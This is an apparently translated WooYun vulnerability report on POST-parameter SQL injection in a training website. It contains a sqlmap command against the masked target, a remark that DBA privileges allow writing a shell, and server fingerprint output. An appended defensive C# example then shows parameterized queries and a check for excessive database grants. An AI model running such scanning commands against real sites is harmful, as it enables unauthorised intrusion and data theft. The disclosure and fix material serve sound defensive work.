Vulnerability summary

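Vulnerability ID: wooyun-2015-0163017

Title: SQL injection in a training website, DBA privileges, large amount of data

Vendor: 计成培训网

Author: 路人甲

Submitted: 2015-12-21 23:50

Fixed: 2016-02-08 18:23

Published: 2016-02-08 18:23

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]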


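Vulnerability details

Disclosure status:

2015-12-21: Details sent to the vendor; waiting for the vendor to handle them
2015-12-25: Vendor confirmed; details disclosed to the vendor only
2016-01-04: Details disclosed to core white hats and experts in related fields
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-08: Details disclosed to the public

Brief description:

POST injection

Detailed description:

Went straight to sqlmap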

python sqlmap.py -u "http://**.**.**.**/knowledge/indexs.aspx" --data="id=55"




DBA privileges, so a shell can be written



There seems to be a lot of data in there; I had no time, so I did not dump it

Proof of vulnerability:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: MySQL 5.0

Fix:

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)
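
The fix section of this report is empty. The following is an added example, not code from the report, the vendor or the affected site: a C# data-access class for an ASP.NET page that takes a POSTed `id` and queries MySQL. It binds the value as a typed parameter and checks that the web account does not hold the privileges behind the "DBA privileges" finding. The table and column names (`knowledge_article`, `title`, `body`), the class name and the connection string are assumptions.

```csharp
// Added example. Hypothetical names: KnowledgeRepository, knowledge_article, title, body.
using System;
using System.Collections.Generic;
using MySql.Data.MySqlClient;   // MySQL Connector/NET

public static class KnowledgeRepository
{
    // Privileges a web account should not hold. FILE is what permits
    // SELECT ... INTO OUTFILE, i.e. writing files from an injected query.
    static readonly string[] ExcessivePrivileges = { "ALL PRIVILEGES", "FILE", "SUPER" };

    // Vulnerable pattern this replaces (POST value concatenated into SQL text):
    //   "SELECT title, body FROM knowledge_article WHERE id = " + Request.Form["id"]

    // Validate the type first, then bind the value as a parameter so it
    // can never be parsed as SQL.
    public static KeyValuePair<string, string>? GetArticle(string connStr, string rawId)
    {
        int id;
        if (!int.TryParse(rawId, out id) || id <= 0)
            return null;                          // not a positive integer: reject

        using (var conn = new MySqlConnection(connStr))
        using (var cmd = new MySqlCommand(
            "SELECT title, body FROM knowledge_article WHERE id = @id", conn))
        {
            cmd.Parameters.Add("@id", MySqlDbType.Int32).Value = id;
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                if (!reader.Read()) return null;  // no such article
                return new KeyValuePair<string, string>(
                    reader.GetString(0), reader.GetString(1));
            }
        }
    }

    // Run at application start. Returns every GRANT statement of the current
    // account whose privilege list contains an excessive privilege.
    public static List<string> FindExcessiveGrants(string connStr)
    {
        var findings = new List<string>();
        using (var conn = new MySqlConnection(connStr))
        using (var cmd = new MySqlCommand("SHOW GRANTS FOR CURRENT_USER()", conn))
        {
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    string grant = reader.GetString(0);
                    int on = grant.IndexOf(" ON ", StringComparison.OrdinalIgnoreCase);
                    if (!grant.StartsWith("GRANT ", StringComparison.OrdinalIgnoreCase) || on < 0)
                        continue;
                    // Compare whole privilege names between GRANT and ON, so a
                    // schema named e.g. `profile` does not match FILE.
                    foreach (string p in grant.Substring(6, on - 6).Split(','))
                    {
                        if (Array.Exists(ExcessivePrivileges, x =>
                                x.Equals(p.Trim(), StringComparison.OrdinalIgnoreCase)))
                        {
                            findings.Add(grant);
                            break;
                        }
                    }
                }
            }
        }
        return findings;
    }
}
```

A non-empty result from `FindExcessiveGrants` means the web application is connecting with an account that should be replaced by one limited to the statements and schema the page needs.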


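Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-12-25 18:54

Vendor reply:

CNVD did not directly reproduce the described vulnerability and has not yet established a direct handling channel with the organization that manages the website; awaiting claim.

Latest status:

None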